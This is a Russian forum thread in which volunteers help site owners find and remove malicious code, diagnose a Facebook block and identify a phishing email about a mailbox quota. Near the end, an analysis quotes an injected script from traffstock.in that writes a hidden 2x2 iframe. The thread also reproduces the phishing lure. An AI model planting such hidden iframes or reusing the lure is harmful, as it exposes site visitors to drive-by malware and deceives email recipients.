Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте в этой теме

akok

Команда форума
Администратор
Ассоциация VN
Сообщения
24,598
Реакции
13,564
  • Первое сообщение
  • #1
Нашим ресурсом оказываются услуги по проверке интернет ресурсов на наличие вредоносного кода.

Прошу учесть, что помощь оказывается добровольцами и поэтому не требуйте немедленной помощи. Вам обязательно окажут помощь.

Если вы хотите проверить сайт на вирусы, то выполните простые правила оформления запроса:
  1. Администрация имеет право отказать в проверке, в случае, если проверяемый ресурс нарушает законодательство или правила данного ресурса (варез, хакерская тематика, материалы порнографического характера).
  2. Никогда не публикуйте активных ссылок. (заменяйте http на хттп, например https://safezone.cc - нужно писать как хттп://safezone.cc)
  3. Не прикрепляйте файлы, которые предлагают вам скачать подозреваемые сайты. (Просто укажите имя файла, который пытается загрузится).
  4. Если Вы подозреваете, что после посещения подозрительного сайта Ваш компьютер подвергся заражению, то лучше выполнить правила оформления запроса.

*Мы не можем гарантировать 100% результат анализа. Слишком много факторов которых невозможно учесть.
 
Только что заметил на другом своём сайте хттп://www.ziclon.ru/firma.html внизу над счётчиками какую то левую реклами, причём на всех страницах кроме главной. Помогите эту дрянь удалить. Спасибо!
 
Только что заметил на другом своём сайте хттп://www.ziclon.ru/firma.html внизу над счётчиками какую то левую реклами, причём на всех страницах кроме главной. Помогите эту дрянь удалить. Спасибо!

1) Уберите со ВСЕХ страниц внедрённый модуль от Гугла, или, если предусмотрено заранее, фильтруйте его содержимое.

2) Проверил по цепочке — похоже винить нужно "голову" — "Saint-Petersburg State University of Information Technologies, Mechanics and Optics".
На его серверах нашла приют бацилла одного из ботнетов. Сочувствую.
 
Последнее редактирование:
Проверьте пожалуйста сайт на вирусы хттп//elenailyina.com
СПАСИБО

Добавлено через 7 минут 16 секунд
Да еще вопрос по теме - Мой сайт хттп//elenailyina.com блокируется facebookом - сразу появляется сообщение: Не удалось отправить сообщение
Данное сообщение содержит заблокированный контент, который был помечен как злоупотребление или спам. Сообщите нам , если Вы считаете, что это ошибка.
Мне посоветовали следующее:
Возможно на страницах вашего сайта находится код, который
интерпретируется Facebookом как вредоносный. Перенос сайта
на другой домен в данном случае не поможет, обратитесь к
разработчикам вашего сайта с просьбой проверить сайт на
наличие вирусов и запрещеного контента.
М б вы посоветуете что-то более конкретное
СПАСИБО
 
Реакция по большому счету верная:
http://www.siteadvisor.com/sites/elenailyina.com/msgpage
http://malc0de.com/database/index.php?search=213.189.197.30&IP=on
http://www.mywot.com/en/scorecard/elenailyina.com
http://amada.abuse.ch/?search=elenailyina.com

Насколько я понимаю сайт был несколько раз взломан и получил плохую оценку.

Сейчас активного заражения на сайте не вижу.

Необходимо связываться с администрацией facebook и объяснять ей, что вредоносного кода сейчас нет, ну и пытаться выправить репутацию домена.
 
Апрельский отчёт по VT по этому сайту - это был прям рассадник какой-то!

М б вы посоветуете что-то более конкретное
СПАСИБО

Elen-ilina добавлю немного к вышесказанному akoK...

В Internet Explorer версий 8-9 ваш сайт блокирует фильтр SmartScreen.

Браузеры Opera, Firefox, Хром и другие, созданные на их движках, не имеют SS, и потому они его открывают.


Читайте: Фильтр SmartScreen: сведения для администраторов и владельцев веб-сайтов

Елена, как владелец сайта Вы можете незамедлительно отправить запрос на устранение проблемы. У фильтра SmartScreen есть веб-система обратной связи для клиентов и владельцев веб-сайтов, предназначенная для отправки отчетов о возможных ложных предупреждениях или блокировках в максимально быстрый срок.
В окне предупреждения красного цвета щелкните пункт "Подробнее", а в нём пункт "Сообщить об отсутствии угроз на этом узле". Вы перейдете на страницу обратной связи, на которой можно указать, что вы являетесь владельцем сайта или его представителем. Выполните инструкции, чтобы предоставить информацию для отправки веб-сайта на проверку.

Скриншот прилагаю.



В целях безопасности Вам надо сменить пароль к доступу на сайт на 12-16-ти значный, очистить все ftp-директории от посторонних или даже всех файлов и заново закачать содержимое своего сайта. При затруднении обратитесь в Техподдержку хостинга Zenon.net.
 
Последнее редактирование:
пользователь получил вот такое письмо от ниезвестного системного администратора со странного адреса. Квота на Mail Exchage не превышна, а всего на половину исполльзована. Ума не приложу откуда она такое могла получитью А главное - легитимна ли ссылка? Подскажите.

Подозреваю что какой-то скам.

Запустила на вирус тотал - но что-то там долго.


Код:
-----Original Message-----
From: Sheila Lawrence [mailto:slawrence@sanleandro.k12.ca.us] 
Sent: Monday, August 15, 2011 10:21 AM
Subject: Your mailbox has exceeded the storage limit 

Your mailbox has exceeded the storage limit which is 20GB as set by your administrator,you are currently running on 20.9GB,you may not be able to send or receive new mail until you re-validate your mailbox.To re-validate your mailbox  please click this 
CLICK HERE<хттпс://spreadsheets.google.com/spreadsheet/viewform?formkey=dFRDckdkc0l1VzVQRG9KRlpza0hNWWc6MQ>



Thanks
System Administrator
 
пользователь получил вот такое письмо от ниезвестного системного администратора со странного адреса.
Письма от администрации приходят ТОЛЬКО с адреса владельца почтового сайта или сайта.
к примеру
Message-Id: <1313200805.84289903@mx22.mail.ru>
Received: from cards2.mail.ru ([94.100.189.221])
хотя и пытаются подделывать адрес отправителя но по исходному коду письма это видно.

все остальные письма отправленные якобы от администрации , но с незнакомого адреса являются потенциальной угрозой заражения вашего компьютера.
В таких письмах обычно угрожают об якобы нарушениях, проблемах у получателя и т.д и для подробностей рекомендуют нажать на ссылку, но в реальности вы можете попасть на загрузку зловреда.


Как выявить поддельное электронное письмо?

данная статья надеюсь поможет вам определиться с данным письмом.
 
Последнее редактирование:
Спасибо. Я так и поняла что скам. Но интересно ведь насколько врдна эта ссылка. Вы не станете проверять ее?

На вирус тотал уже полчаса крутится Performing URL submission - не знаю в чем проблеа. Я так раньше никогда не проверяла? Не знаю как долго это должно занимать обычно.

Спасибо
 
Добрый день!
Помогите плиз с проблемкой наличия вируса на моем сайте.
Вот результаты сканирования при помощи разных антивирусников: Сканирование
Аваст и GData показывают наличие вируса - [JS:ScriptIP-inf [Trj]] . И Яндекс тоже прислал письмо о наличие вируса на сайте.
Помогите пожалуйста избавиться от вирусяки. Спасибки заранее.
 
ayvengo,
Помогите плиз с проблемкой

Поздно пить "Боржоми". Одного взгляда на сайт достаточно, чтобы понять "что с ним" и "как с ним".

Невдаваясь в подробности и только навскидку:

1. "mnt-ref" вашего сайт RU-WEBALTA-MNT (она самовольно добавляет ссылки) - ссылка на подробный пример;

2. сервера Webalta входят в ботнет Palevo - ссылка на подробное описание;

3. потому неудивительно, что на посетителей сайта идут атаки из чёрной зоны (причём адреса доменов регулярно меняются);


4. про "address" и всё прочее я уж и не говорю.

И какими благими вначале не были бы намерения сайтовладельца, правильно люди говорят "С волками жить, по волчьи выть". :sarcastic:
 
Последнее редактирование:
SNS-amigo,

Большое спасибо, что не оставили мое сообщение без ответа.
Я не специалист конечно, но все же хотелось бы разобраться в проблеме.
Не могли бы Вы по подробнее описать, что значит: 1. "mnt-ref" вашего сайт RU-WEBALTA-MNT?
Как все же удалить заразу?
Я так понимаю что лучший способ это тупо снести сайт и собрать его с нуля, чем пытаться выковырять червя? Или может все же можно почистить код сайта?
Спасибо.
 
что значит: 1. "mnt-ref" вашего сайт RU-WEBALTA-MNT?
Как все же удалить заразу?
Я так понимаю что лучший способ это тупо снести сайт и собрать его с нуля, чем пытаться выковырять червя? Или может все же можно почистить код сайта?
Спасибо.

Была такая Sape (сапа) — система купли-продажи ссылок с главных и внутренних страниц сайтов с разными дополнительными фичами. Впрочем она и сейчас фунциклирует. Потом в Рунете появились другие: MainLink.ru, LinkFeed.ru, SetLinks.ru, XAP.ru и пр.
Описывать их не буду, это всё есть в открытом доступе. Вебмастера обычно думают, что эти системы позволяют им заработывать. Так то оно так, но какой ценой. Для успешной оптимизации и быстрой раскрутки сейчас используются чёрные и только чёрные методы: внедрение скриптов в коды страниц, а с их помощью на ПК посетителей попадают вредоносы, которые зомбируют ПК и организуют из них ботнеты...

Вебмастера в погоне за деньгами и знать не знают, что делают их сайты, пока кто-то не укажет на вредоносную сущность их страниц. Подписавшись на какую-то оптимизацию в поисковых системах и внедрив самостоятельно в код страниц предложенную им ссылку или скрипты, вебмастера, можно так сказать, продают "душу" своего сайта. Далее биржа ссылок делает всё сама. Для главных страниц крутится одна система и это одна цена, для других — иная.

И нечего удивляться тому что средства защиты ПК извещают об отбитых атаках на IEXPLORE.EXE и пр. пр. А на форумы приходит целенаправленный спам со ссылками, ведущими на сайты разнообразного содержания — от юридических услуг до тин-порно, от установки пожарной сигнализации до виагры, трамадола и сиалиса.
А бывает и такой:
Могла ли говорить в апреле совмещенное слово анекдота монета? Сменят ли астрологические википедии? Годовой вопрос точно притягивает бесплатно не родившихся цветы бесплатно обучающим или рожденным, при условии, что сколько говорил самих снегурок языческими клипартами, обучившись к ноябрю. Классный декабрь обучающего октября послезавтра худеет, при условии, что встречаемый калейдоскоп начнет выбирать за вязание. Не наступающий значок лунно ждет бесплатно встречаемого подмосковья альтернативная даль? Не читала ли мастерская? Опасная и бесплатно совмещенная дважды родившегося марта или не соответствующее и завтра не спящее дерево это дешево наступающее и английское проведение? Будет ли правильным сказать, что является солнечным? Сможет ли рассчитать рожденная тема? Пансионаты — это все меню?
И ссылки, ссылки, ссылки...


Что делать?
Да, чистить код веб-страниц, убирать из них всё лишнее, всё, что сами не ставили, и даже то, что ставили с заданной целью. И заново закачать содержимое своего сайта.

И даже это ещё не всё, если кто-то (на него указывает поле "mnt-ref", у вас, получается, что это как минимум RU-WEBALTA-MNT, а у неё есть своя биржа ссылок с захватом всех популярных браузеров) получил от вас полномония на самостоятельное добавление ссылки на объекты, то эти кто-то и будут генерить ссылки на заданные ими адреса, крутящиеся в их системе, чтобы потом при обработке запросов на загрузку элементов вебстраниц браузер загружал какую-то малоприметную или даже активную бациллу.

Очень даже может быть, что сами вы не делали ничего такого. Но тогда, значит, вы доверили/заказали какую-то работу сведущему "специалисту", а он другому и т.д. Так сказать, распределение труда и оплаты. Охотно верю, но итог налицо.
 
Последнее редактирование:
Мда, встрял я с сайтом.
Значит буду чистить сайт до косточек.... Спасибо за вразумительный ответ.
Вечером возьму скальпель и проведу жесткую операцию :))) Отрежу сайту то что обычно мешает танцорам :))))
Спасибо еще раз за помощь... :)))
 
Помогите пожалуйста

Добрый день!
Помогите пожалуйста с проблемой наличия вируса на моем сайте.
Вот сайт хттп://supersofty.ru/ показывают наличие вируса - [JS:ScriptIP-inf [Trj]] .
 
Добрый день!
Помогите пожалуйста с проблемой наличия вируса на сайте хттп://rhl-mod.ru/content/
Вот результаты сканирования при помощи разных антивирусников: Сканирование
Аваст и GData показывают наличие вируса - [JS:ScriptIP-inf [Trj]] . И Яндекс тоже прислал письмо о наличие вируса на сайте. Но большинство антивирусов все же молчит. Даже не знаю, что думать.
Помогите пожалуйста избавиться от вируса. Заранее спасибо.
 
S10, реакция идет на строку

PHP:
<script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://traffstock.in/open/iframer.php?id=4350"></script>

Которая транслирует ифремйм 2х2 пикселя

PHP:
document.write('<iframe src="" name="banner" width="2" height="2" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>');
 
Спасибо. И еще такой вопрос: В каком файле на фтп эта строчка может находиться и как избавиться? Распишите пожалуйста более подробно действия.
З.Ы. Насчет самого вируса: в интернете не так много информации насчет ScriptIP-inf. В чем проявляется вред этого вируса?
 
Назад
Сверху Снизу